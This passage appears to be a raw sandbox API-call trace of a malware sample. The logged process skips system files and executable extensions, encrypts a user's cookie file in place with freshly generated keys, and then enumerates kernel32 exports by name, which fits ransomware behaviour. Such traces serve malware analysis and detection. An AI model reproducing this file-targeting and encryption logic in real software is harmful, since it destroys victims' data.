(lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", lpString2="boot.ini") returned -1 [0078.988] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", lpString2="desktop.ini") returned -1 [0078.988] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", lpString2="ntuser.dat") returned -1 [0078.988] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", lpString2="iconcache.db") returned -1 [0078.988] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", lpString2="bootsect.bak") returned -1 [0078.988] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", lpString2="ntuser.dat.log") returned -1 [0078.988] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", lpString2="thumbs.db") returned -1 [0078.988] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", lpString2="Bootfont.bin") returned -1 [0078.988] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@rlcdn[2].txt") returned 33 [0078.988] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0078.988] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0078.988] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0078.988] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0078.988] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0078.988] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@rlcdn[2].txt") returned 33 [0078.988] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0078.988] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@rlcdn[2].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt" [0078.988] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.988] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.989] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=414) returned 1 [0078.990] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.990] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.990] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.990] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.990] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.990] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.991] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.991] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.991] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.991] CloseHandle (hObject=0x45c) returned 1 [0078.991] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.992] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.992] CloseHandle (hObject=0x0) returned 0 [0078.992] CloseHandle (hObject=0x458) returned 1 [0078.993] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.993] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.994] GetTickCount () returned 0x114c3dc [0078.994] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.994] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.994] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.994] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.994] lstrlenA (lpString="kernel32.dll") returned 12 [0078.995] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.995] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.995] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.995] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.995] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.995] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.995] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.995] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.995] lstrlenA (lpString="ADDATOMA") returned 8 [0078.995] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.995] lstrlenA (lpString="ADDATOMW") returned 8 [0078.995] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.995] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.995] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.995] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.995] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.995] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.996] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.996] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.996] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.996] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.996] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.996] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.996] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.996] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.996] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.996] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.996] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.996] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.996] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.996] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.996] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.996] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.996] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.996] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.997] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.997] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.997] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.997] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.997] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.997] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.997] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.997] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.997] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.997] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.997] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.997] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.997] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.997] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.997] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.997] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.997] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.997] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.997] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.997] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.998] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.998] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.998] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.998] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.998] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.998] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.998] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.998] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.998] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.998] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.998] lstrlenA (lpString="BEEP") returned 4 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.998] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.998] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.998] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.998] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.998] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.998] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.998] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.998] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.999] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.999] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.999] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.999] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.999] lstrlenA (lpString="CANCELIO") returned 8 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.999] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.999] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.999] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.999] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.999] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.999] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.999] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.999] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.999] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.999] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.999] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.999] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.999] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.999] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.000] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.000] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.000] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.000] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.000] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.000] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.000] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.000] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.000] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.000] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.000] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.000] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.000] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.000] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.000] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") 